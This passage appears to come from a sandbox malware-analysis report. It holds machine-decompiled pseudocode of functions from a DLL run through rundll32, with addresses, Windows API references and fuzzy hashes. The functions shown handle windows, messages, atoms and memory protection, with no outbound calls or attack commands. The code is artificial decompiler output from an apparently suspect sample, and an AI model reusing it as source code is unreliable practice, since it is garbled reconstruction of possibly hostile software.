								 *(__esi + 0x5c) = __eax;
								__eax = E100291EF(__ebp - 0x20, __eflags);
							}
							__eflags = __edi - 0xfffffd43;
							__eax =  *(__ebp + 0x10);
							 *__eax = 3;
							if(__edi != 0xfffffd43) {
								__esi =  *(__esi + 0x5c);
							} else {
								__esi =  *(__esi + 0x58);
							}
							 *(__eax + 8) = __esi;
							goto L19;
						case 7:
							__eflags =  *(__esi + 0x60);
							if( *(__esi + 0x60) != 0) {
								L13:
								__edi =  *(__ebp + 0x10);
								 *__edi = 9;
								__eax =  *(__esi + 0x60);
								__ecx =  *__eax;
								_push(__eax);
								__eax =  *(__esi + 0x60);
								 *(__edi + 8) =  *(__esi + 0x60);
								goto L19;
							} else {
								__ecx =  *(__esi + 0x1c);
								__eax = E100090C8( *(__esi + 0x1c));
								__ecx = __esi;
								__eax = E1000943B(__esi, __eax);
								__eflags =  *(__esi + 0x60);
								if( *(__esi + 0x60) == 0) {
									goto L20;
								} else {
									goto L13;
								}
							}
							goto L21;
						case 8:
							__eax = E100243B2();
							__edx =  *__eax;
							__ecx = __eax;
							_t43 = __eax + 0x10; // 0x10
							__esi = _t43;
							 *(__ebp + 0xc) = __esi;
							__edi =  *(__ebp + 0x10);
							 *(__ebp - 4) =  *(__ebp - 4) & 0x00000000;
							__ecx = __ebp + 0xc;
							 *__edi = 8;
							 *(__edi + 8) = E10035C0F(__ebx, __ebp + 0xc, __edi, __esi, __ebp);
							_t50 = __esi - 0x10; // 0x0
							__ecx = _t50;
							L18:
							__eax = E100014B0(__ecx, __edx);
							L19:
							_t63 = 1;
							goto L21;
						case 9:
							goto L20;
					}
				}
				L21:
				 *[fs:0x0] =  *((intOrPtr*)(_t76 - 0xc));
				return _t63;
			}






                                                                        0x10009b7c
                                                                        0x10009b89
                                                                        0x10009b94
                                                                        0x10009d29
                                                                        0x10009d29
                                                                        0x10009b9a
                                                                        0x10009ba1
                                                                        0x00000000
                                                                        0x10009bcc
                                                                        0x10009bcf
                                                                        0x10009bd4
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10009ba8
                                                                        0x10009bab
                                                                        0x10009bb0
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10009c82
                                                                        0x10009c85
                                                                        0x10009c88
                                                                        0x10009c92
                                                                        0x10009c94
                                                                        0x10009c96
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10009bba
                                                                        0x10009bbd
                                                                        0x10009bc2
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10009ce0
                                                                        0x10009ce5
                                                                        0x10009ce7
                                                                        0x10009ce9
                                                                        0x10009cef
                                                                        0x10009cf7
                                                                        0x10009cfa
                                                                        0x10009d01
                                                                        0x10009d06
                                                                        0x10009d09
                                                                        0x10009d0c
                                                                        0x10009d11
                                                                        0x10009d16
                                                                        0x10009d19
                                                                        0x10009d1c
                                                                        0x10009d1c
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10009c9f
                                                                        0x10009ca2
                                                                        0x10009cad
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10009bdf
                                                                        0x10009be3
                                                                        0x10009be5
                                                                        0x10009be8
                                                                        0x10009bf0
                                                                        0x10009c00
                                                                        0x10009c12
                                                                        0x10009c15
                                                                        0x10009c1b
                                                                        0x10009c1e
                                                                        0x10009c21
                                                                        0x10009c21
                                                                        0x10009c26
                                                                        0x10009c2c
                                                                        0x10009c2f
                                                                        0x10009c34
                                                                        0x10009c3b
                                                                        0x10009c36
                                                                        0x10009c36
                                                                        0x10009c36
                                                                        0x10009c3e
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10009c46
                                                                        0x10009c4a
                                                                        0x10009c66
                                                                        0x10009c66
                                                                        0x10009c69
                                                                        0x10009c6e
                                                                        0x10009c71
                                                                        0x10009c73
                                                                        0x10009c77
                                                                        0x10009c7a
                                                                        0x00000000
                                                                        0x10009c4c
                                                                        0x10009c4c
                                                                        0x10009c4f
                                                                        0x10009c55
                                                                        0x10009c57
                                                                        0x10009c5c
                                                                        0x10009c60
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10009c60
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10009cb2
                                                                        0x10009cb7
                                                                        0x10009cb9
                                                                        0x10009cbe
                                                                        0x10009cbe
                                                                        0x10009cc1
                                                                        0x10009cc4
                                                                        0x10009cc7
                                                                        0x10009ccb
                                                                        0x10009cce
                                                                        0x10009cd8
                                                                        0x10009cdb
                                                                        0x10009cdb
                                                                        0x10009d1f
                                                                        0x10009d1f
                                                                        0x10009d24
                                                                        0x10009d26
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10009ba1
                                                                        0x10009d2b
                                                                        0x10009d30
                                                                        0x10009d38

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: Color$H_prologLocaleMessageSendTextThread
                                                                        • String ID:
                                                                        • API String ID: 741590120-0
                                                                        • Opcode ID: ffd68efac94681e02b946185b7585b592d7a198cf77f0b1454b8da5265c6291b
                                                                        • Instruction ID: 17d43df59e13e7a0fc638ef54e749073bd167348119b36b57266e85b12fc2c17
                                                                        • Opcode Fuzzy Hash: ffd68efac94681e02b946185b7585b592d7a198cf77f0b1454b8da5265c6291b
                                                                        • Instruction Fuzzy Hash: D451543590074ADFEB20DF64C88499EB7F0FF08354F21895AE8569B3A1E774A981CB91
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 100344F5 Relevance: 7.6, APIs: 5, Instructions: 99keyboardCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E100344F5(void* __ecx, intOrPtr _a8) {
				signed int _v7;
				intOrPtr _v8;
				struct tagRECT _v24;
				void* _t44;
				void* _t48;
				void* _t52;
				void* _t57;
				void* _t64;
				signed int _t67;
				void* _t75;
				void* _t76;
				signed int _t78;

				_t75 = __ecx;
				_v8 = E100202AB(__ecx);
				GetWindowRect( *(__ecx + 0x1c),  &_v24);
				_t67 = GetSystemMetrics(0x21);
				_t78 = GetSystemMetrics(0x20);
				_t76 = E1002204B(_t75);
				if((_v7 & 0x00000010) == 0) {
					L5:
					if(_t76 < 0xa || _t76 > 0x11) {
						if(_t76 != 4) {
							goto L16;
						}
						goto L8;
					} else {
						L8:
						if((_v7 & 0x00000008) == 0) {
							InflateRect( &_v24,  ~_t78,  ~_t67);
							if((_v7 & 0x00000002) == 0) {
								L16:
								return _t76;
							}
							_t44 = _t76 - 4;
							if(_t44 == 0) {
								L21:
								return 0xb + (0 | _a8 - _v24.bottom > 0x00000000) * 4;
							}
							_t48 = _t44 - 9;
							if(_t48 == 0) {
								return (0 | _a8 - _v24.top < 0x00000000) + (0 | _a8 - _v24.top < 0x00000000) + 0xa;
							}
							_t52 = _t48 - 1;
							if(_t52 == 0) {
								return (0 | _a8 - _v24.top < 0x00000000) + 0xb;
							}
							_t57 = _t52;
							if(_t57 == 0) {
								return ((0 | _a8 - _v24.bottom <= 0x00000000) - 0x00000001 & 0x00000005) + 0xa;
							}
							if(_t57 == 1) {
								goto L21;
							}
							goto L16;
						}
						_t64 = 2;
						return _t64;
					}
				}
				if(_t76 == 3) {
					_t76 = 2;
				}
				if(GetKeyState(2) >= 0) {
					goto L5;
				} else {
					return 0;
				}
			}















                                                                        0x100344fe
                                                                        0x10034505
                                                                        0x1003450f
                                                                        0x10034521
                                                                        0x10034527
                                                                        0x10034532
                                                                        0x10034534
                                                                        0x1003454f
                                                                        0x10034552
                                                                        0x1003455c
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1003455e
                                                                        0x1003455e
                                                                        0x10034562
                                                                        0x10034573
                                                                        0x1003457d
                                                                        0x10034595
                                                                        0x00000000
                                                                        0x10034595
                                                                        0x10034581
                                                                        0x10034584
                                                                        0x100345d3
                                                                        0x00000000
                                                                        0x100345de
                                                                        0x10034586
                                                                        0x10034589
                                                                        0x00000000
                                                                        0x100345cd
                                                                        0x1003458b
                                                                        0x1003458c
                                                                        0x00000000
                                                                        0x100345bd
                                                                        0x1003458f
                                                                        0x10034590
                                                                        0x00000000
                                                                        0x100345ad
                                                                        0x10034593
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10034593
                                                                        0x10034566
                                                                        0x00000000
                                                                        0x10034566
                                                                        0x10034552
                                                                        0x10034539
                                                                        0x1003453d
                                                                        0x1003453d
                                                                        0x10034549
                                                                        0x00000000
                                                                        0x1003454b
                                                                        0x00000000
                                                                        0x1003454b

                                                                        APIs
                                                                          • Part of subcall function 100202AB: GetWindowLongA.USER32 ref: 100202B6
                                                                        • GetWindowRect.USER32 ref: 1003450F
                                                                        • GetSystemMetrics.USER32 ref: 1003451D
                                                                        • GetSystemMetrics.USER32 ref: 10034523
                                                                        • GetKeyState.USER32 ref: 10034540
                                                                        • InflateRect.USER32(?,00000000,00000000), ref: 10034573
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: MetricsRectSystemWindow$InflateLongState
                                                                        • String ID:
                                                                        • API String ID: 2406722796-0
                                                                        • Opcode ID: ca75ff146dd13cf3a9a81e35c2b644f3561e541cec42ef1ad0753529e650aa81
                                                                        • Instruction ID: eebfe8686990ea06ae8873f0c24ea56f3203d68343432915ce32c001f6d4e862
                                                                        • Opcode Fuzzy Hash: ca75ff146dd13cf3a9a81e35c2b644f3561e541cec42ef1ad0753529e650aa81
                                                                        • Instruction Fuzzy Hash: 2A31D63AE0051DEFDB12DBA8C888EAE7BA5EF49291F464416D802DF193CE34F940C650
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10010839 Relevance: 7.6, APIs: 5, Instructions: 92memoryCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 86%
                                                                        			E10010839(void* __ecx, void* __eflags) {
				void* _v8;
				long _v12;
				long _v16;
				signed char _v23;
				struct _MEMORY_BASIC_INFORMATION _v44;
				struct _SYSTEM_INFO _v80;
				void* _v92;
				void* _t29;
				int _t33;
				intOrPtr _t35;
				void* _t43;
				void* _t46;
				signed int _t49;
				void* _t54;
				void* _t55;
				void* _t62;
				void* _t63;

				_t29 = 4;
				E10010B20(_t29, __ecx);
				_t55 = _t63;
				if(VirtualQuery(_t55,  &_v44, 0x1c) == 0) {
					L9:
					_t33 = 0;
				} else {
					_t46 = _v44.AllocationBase;
					GetSystemInfo( &_v80);
					_t49 = _v80.dwPageSize;
					_t35 =  *0x1004f3e0; // 0x2
					_t54 = ( !(_t49 - 1) & _t55) - _t49;
					asm("sbb esi, esi");
					_t62 = (( ~(_t35 - 1) & 0xfffffff1) + 0x11) * _t49 + _t46;
					_v12 = _t49;
					if(_t54 < _t62) {
						goto L9;
					} else {
						if(_t35 == 1) {
							_v8 = _t54;
							goto L14;
						} else {
							_v8 = _t46;
							while(VirtualQuery(_v8,  &_v44, 0x1c) != 0) {
								_v8 = _v8 + _v44.RegionSize;
								if((_v44.State & 0x00001000) == 0) {
									continue;
								} else {
									_t43 = _v44.BaseAddress;
									_v8 = _t43;
									if((_v23 & 0x00000001) == 0) {
										if(_t54 >= _t43) {
											if(_t43 < _t62) {
												_v8 = _t62;
											}
											VirtualAlloc(_v8, _v12, 0x1000, 4);
											_t35 =  *0x1004f3e0; // 0x2
											L14:
											asm("sbb eax, eax");
											_t33 = VirtualProtect(_v8, _v12, ( ~(_t35 - 1) & 0x00000103) + 1,  &_v16);
										} else {
											goto L9;
										}
									} else {
										_t33 = 1;
									}
								}
								goto L15;
							}
							goto L9;
						}
					}
				}
				L15:
				return _t33;
			}




















                                                                        0x10010844
                                                                        0x10010845
                                                                        0x1001084a
                                                                        0x1001085b
                                                                        0x100108d4
                                                                        0x100108d4
                                                                        0x1001085d
                                                                        0x1001085d
                                                                        0x10010864
                                                                        0x1001086a
                                                                        0x1001086d
                                                                        0x10010879
                                                                        0x10010880
                                                                        0x1001088b
                                                                        0x1001088f
                                                                        0x10010892
                                                                        0x00000000
                                                                        0x10010894
                                                                        0x10010897
                                                                        0x100108f5
                                                                        0x00000000
                                                                        0x10010899
                                                                        0x10010899
                                                                        0x100108a1
                                                                        0x100108b7
                                                                        0x100108bd
                                                                        0x00000000
                                                                        0x100108bf
                                                                        0x100108c3
                                                                        0x100108c6
                                                                        0x100108c9
                                                                        0x100108d2
                                                                        0x100108da
                                                                        0x100108dc
                                                                        0x100108dc
                                                                        0x100108e8
                                                                        0x100108ee
                                                                        0x100108f8
                                                                        0x100108fb
                                                                        0x1001090e
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x100108cb
                                                                        0x100108cd
                                                                        0x100108cd
                                                                        0x100108c9
                                                                        0x00000000
                                                                        0x100108bd
                                                                        0x00000000
                                                                        0x100108a1
                                                                        0x10010897
                                                                        0x10010892
                                                                        0x10010914
                                                                        0x1001091b

                                                                        APIs
                                                                        • VirtualQuery.KERNEL32(?,?,0000001C), ref: 10010853
                                                                        • GetSystemInfo.KERNEL32(?,?,?,0000001C), ref: 10010864
                                                                        • VirtualQuery.KERNEL32(?,?,0000001C,?,?,0000001C), ref: 100108AA
                                                                        • VirtualAlloc.KERNEL32(?,?,00001000,00000004,?,?,0000001C), ref: 100108E8
                                                                        • VirtualProtect.KERNEL32(?,?,00000002,?,?,?,0000001C), ref: 1001090E
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: Virtual$Query$AllocInfoProtectSystem
                                                                        • String ID:
                                                                        • API String ID: 4136887677-0
                                                                        • Opcode ID: 71a51d1d86ecf8343d385652834c01b8084f8671a74ced250a72b247972f9a76
                                                                        • Instruction ID: ea62dba494344a01c7efc91e140871f3e8746f8623a2ca282db0dc9e1cf87e08
                                                                        • Opcode Fuzzy Hash: 71a51d1d86ecf8343d385652834c01b8084f8671a74ced250a72b247972f9a76
                                                                        • Instruction Fuzzy Hash: 60316D32E0425DEBEF10CBA8CD85AED7BB8EB05355F110165F981EB191DBB09A809B90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10022C99 Relevance: 7.6, APIs: 5, Instructions: 91windowCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 95%
                                                                        			E10022C99(void* __ebx, intOrPtr __ecx, void* __eflags) {
				void* _t31;
				signed int _t42;
				struct HWND__* _t62;
				void* _t64;
				void* _t69;

				_t69 = __eflags;
				E10011BF0(0x1003a5dc, _t64);
				 *((intOrPtr*)(_t64 - 0x10)) = __ecx;
				E1001FFB4(_t64 - 0x38);
				E10021613(_t64 - 0x88, _t69);
				 *(_t64 - 4) = 0;
				_t62 = GetTopWindow( *(__ecx + 0x1c));
				if(_t62 != 0) {
					do {
						 *(_t64 - 0x6c) = _t62;
						 *(_t64 - 0x34) = GetDlgCtrlID(_t62) & 0x0000ffff;
						_push(_t62);
						 *((intOrPtr*)(_t64 - 0x24)) = _t64 - 0x88;
						if(E10022115() == 0 || E1001FE3C(_t35, 0, 0xbd11ffff, _t64 - 0x38, 0) == 0) {
							if(E1001FE3C( *((intOrPtr*)(_t64 - 0x10)),  *(_t64 - 0x34), 0xffffffff, _t64 - 0x38, 0) == 0) {
								_t46 =  *((intOrPtr*)(_t64 + 0xc));
								if( *((intOrPtr*)(_t64 + 0xc)) != 0) {
									if((SendMessageA( *(_t64 - 0x6c), 0x87, 0, 0) & 0x00000020) == 0) {
										L11:
										_t46 = 0;
									} else {
										_t42 = E100202AB(_t64 - 0x88) & 0x0000000f;
										if(_t42 == 3 || _t42 == 6 || _t42 == 7 || _t42 == 9) {
											goto L11;
										}
									}
								}
								E1001FFDA(_t64 - 0x38,  *((intOrPtr*)(_t64 + 8)), _t46);
							}
						}
						_t62 = GetWindow(_t62, 2);
					} while (_t62 != 0);
				}
				 *(_t64 - 4) =  *(_t64 - 4) | 0xffffffff;
				 *(_t64 - 0x6c) = 0;
				_t31 = E10022977(_t64 - 0x88);
				 *[fs:0x0] =  *((intOrPtr*)(_t64 - 0xc));
				return _t31;
			}








                                                                        0x10022c99
                                                                        0x10022c9e
                                                                        0x10022cad
                                                                        0x10022cb0
                                                                        0x10022cbb
                                                                        0x10022cc5
                                                                        0x10022cce
                                                                        0x10022cd2
                                                                        0x10022cd9
                                                                        0x10022cda
                                                                        0x10022ce6
                                                                        0x10022cef
                                                                        0x10022cf0
                                                                        0x10022cfa
                                                                        0x10022d26
                                                                        0x10022d28
                                                                        0x10022d2d
                                                                        0x10022d42
                                                                        0x10022d66
                                                                        0x10022d66
                                                                        0x10022d44
                                                                        0x10022d4f
                                                                        0x10022d55
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10022d55
                                                                        0x10022d42
                                                                        0x10022d6f
                                                                        0x10022d6f
                                                                        0x10022d26
                                                                        0x10022d7d
                                                                        0x10022d7f
                                                                        0x10022d87
                                                                        0x10022d88
                                                                        0x10022d92
                                                                        0x10022d95
                                                                        0x10022d9f
                                                                        0x10022da7

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: Window$CtrlH_prologMessageSend
                                                                        • String ID:
                                                                        • API String ID: 4125289812-0
                                                                        • Opcode ID: 19a7042d3ee7ac9ff937cd3b65bdcc34620a1ee98de378f8268fb43055ccdf2e
                                                                        • Instruction ID: f32dedf2229806a380f5c1e0926675dad0c5831b186d9175a334cabdc35765a6
                                                                        • Opcode Fuzzy Hash: 19a7042d3ee7ac9ff937cd3b65bdcc34620a1ee98de378f8268fb43055ccdf2e
                                                                        • Instruction Fuzzy Hash: 7931D435C00258BECB25DBA4EC84AFDB7B8FF56250F90421AF456E7151DB30AE85CB50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 100316E6 Relevance: 7.6, APIs: 5, Instructions: 66windowCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E100316E6(void* __ecx, unsigned int _a4) {
				struct HWND__* _t20;
				void* _t23;
				void* _t33;
				void* _t34;
				struct HWND__* _t35;

				_t34 = __ecx;
				if((E100202AB(__ecx) & 0x40000000) == 0) {
					_t33 = E10022AD5(__ecx);
				} else {
					_t33 = __ecx;
				}
				if((_a4 & 0x0000000c) != 0) {
					_t23 = E100203CE(_t33);
					if(( !(_a4 >> 3) & 0x00000001) == 0 || _t23 == 0 || _t33 == _t34) {
						SendMessageA( *(_t33 + 0x1c), 0x86, 0, 0);
					} else {
						 *(_t34 + 0x39) =  *(_t34 + 0x39) | 0x00000002;
						SendMessageA( *(_t33 + 0x1c), 0x86, 1, 0);
						 *(_t34 + 0x39) =  *(_t34 + 0x39) & 0x000000fd;
					}
				}
				_t20 = GetWindow(GetDesktopWindow(), 5);
				while(1) {
					_t35 = _t20;
					if(_t35 == 0) {
						break;
					}
					if(E100310CC( *(_t33 + 0x1c), _t35) != 0) {
						SendMessageA(_t35, 0x36d, _a4, 0);
					}
					_t20 = GetWindow(_t35, 2);
				}
				return _t20;
			}








                                                                        0x100316ea
                                                                        0x100316f6
                                                                        0x10031703
                                                                        0x100316f8
                                                                        0x100316f8
                                                                        0x100316f8
                                                                        0x10031710
                                                                        0x10031714
                                                                        0x10031725
                                                                        0x10031753
                                                                        0x1003172f
                                                                        0x1003172f
                                                                        0x1003173f
                                                                        0x10031741
                                                                        0x10031741
                                                                        0x10031725
                                                                        0x10031784
                                                                        0x10031784
                                                                        0x10031786
                                                                        0x1003178a
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10031771
                                                                        0x1003177f
                                                                        0x1003177f
                                                                        0x10031784
                                                                        0x10031784
                                                                        0x10031790

                                                                        APIs
                                                                          • Part of subcall function 100202AB: GetWindowLongA.USER32 ref: 100202B6
                                                                        • SendMessageA.USER32 ref: 1003173F
                                                                        • SendMessageA.USER32 ref: 10031753
                                                                        • GetDesktopWindow.USER32 ref: 10031757
                                                                        • SendMessageA.USER32 ref: 1003177F
                                                                        • GetWindow.USER32(00000000), ref: 10031784
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSendWindow$DesktopLong
                                                                        • String ID:
                                                                        • API String ID: 2272707703-0
                                                                        • Opcode ID: 73e2593b8f262eaeb4f4e94dd705a49f5985a06933a3941b6edb2e6593d9f2be
                                                                        • Instruction ID: b2d0115702f01622c71e7e90a3c3b5da49a9f5b0f30be2a1795dd18db7154202
                                                                        • Opcode Fuzzy Hash: 73e2593b8f262eaeb4f4e94dd705a49f5985a06933a3941b6edb2e6593d9f2be
                                                                        • Instruction Fuzzy Hash: AC1106312447156BE333CA219C86FDE7ABAEF4AB91F154114F6409E1D2CF91EC418395
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10031E6F Relevance: 7.6, APIs: 5, Instructions: 62windowCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E10031E6F(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, struct HWND__* _a4, unsigned int _a8) {
				intOrPtr _v8;
				char _v268;
				intOrPtr _v272;
				intOrPtr _t20;
				int _t24;
				unsigned int _t45;
				intOrPtr _t52;

				_t20 =  *0x1004c470; // 0x1bfbe703
				_v8 = _t20;
				_v272 = __ecx;
				_t52 =  *((intOrPtr*)(E100373B5() + 4));
				if(_t52 != 0 && _a8 != 0) {
					_t45 = _a8 >> 0x10;
					if(_t45 != 0) {
						_t24 =  *(_t52 + 0x8c);
						if(_a8 == _t24 && _t45 ==  *(_t52 + 0x8e)) {
							GlobalGetAtomNameA(_t24,  &_v268, 0x103);
							GlobalAddAtomA( &_v268);
							GlobalGetAtomNameA(0,  &_v268, 0x103);
							GlobalAddAtomA( &_v268);
							SendMessageA(_a4, 0x3e4,  *(_v272 + 0x1c), ( *(_t52 + 0x8e) & 0x0000ffff) << 0x00000010 |  *(_t52 + 0x8c) & 0x0000ffff);
						}
					}
				}
				return E100117AE(0, _v8);
			}










                                                                        0x10031e78
                                                                        0x10031e7e
                                                                        0x10031e81
                                                                        0x10031e8c
                                                                        0x10031e91
                                                                        0x10031ea5
                                                                        0x10031eab
                                                                        0x10031eb1
                                                                        0x10031ebc
                                                                        0x10031edc
                                                                        0x10031eeb
                                                                        0x10031f03
                                                                        0x10031f0c
                                                                        0x10031f33
                                                                        0x10031f3a
                                                                        0x10031ebc
                                                                        0x10031eab
                                                                        0x10031f47

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: AtomGlobal$Name$MessageSend
                                                                        • String ID:
                                                                        • API String ID: 1515195355-0
                                                                        • Opcode ID: 18f948bbb074b7511017b7146c05a941aef01dbd5fd54326c2498a16bdc2d2e7
                                                                        • Instruction ID: 486b4a3070eef5cedf278f6f896eb776bbd2baf7572d0ea587dcdbf0f4b3db2c
                                                                        • Opcode Fuzzy Hash: 18f948bbb074b7511017b7146c05a941aef01dbd5fd54326c2498a16bdc2d2e7
                                                                        • Instruction Fuzzy Hash: 301130759001189EDB51DB65CC90AEAB3F8FF18740F408455E599DB141DBB4AAC1CF60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10033E13 Relevance: 7.6, APIs: 5, Instructions: 58COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 82%
                                                                        			E10033E13(intOrPtr* __ecx, int* _a4) {
				int _v8;
				int _t12;
				int _t14;
				int _t22;
				int _t32;
				int* _t36;

				_push(__ecx);
				_t35 = __ecx;
				if(__ecx == 0) {
					_t22 =  *0x1004efa8; // 0x60
					_t12 =  *0x1004efac; // 0x60
					goto L6;
				} else {
					_t32 = GetMapMode( *(__ecx + 8));
					if(_t32 >= 7 || _t32 == 1) {
						_t22 = GetDeviceCaps( *(_t35 + 8), 0x58);
						_t12 = GetDeviceCaps( *(_t35 + 8), 0x5a);
						L6:
						_t36 = _a4;
						_v8 = _t12;
						 *_t36 = MulDiv( *_t36, 0x9ec, _t22);
						_t14 = MulDiv(_t36[1], 0x9ec, _v8);
						_t36[1] = _t14;
					} else {
						_push(3);
						 *((intOrPtr*)( *__ecx + 0x34))();
						E10028F83(__ecx, _a4);
						_push(_t32);
						_t14 =  *((intOrPtr*)( *__ecx + 0x34))();
					}
				}
				return _t14;
			}









                                                                        0x10033e16
                                                                        0x10033e19
                                                                        0x10033e1e
                                                                        0x10033e6a
                                                                        0x10033e70
                                                                        0x00000000
                                                                        0x10033e20
                                                                        0x10033e29
                                                                        0x10033e2e
                                                                        0x10033e64
                                                                        0x10033e66
                                                                        0x10033e75
                                                                        0x10033e75
                                                                        0x10033e87
                                                                        0x10033e8f
                                                                        0x10033e95
                                                                        0x10033e97
                                                                        0x10033e35
                                                                        0x10033e37
                                                                        0x10033e3b
                                                                        0x10033e43
                                                                        0x10033e4a
                                                                        0x10033e4d
                                                                        0x10033e4d
                                                                        0x10033e2e
                                                                        0x10033e9e

                                                                        APIs
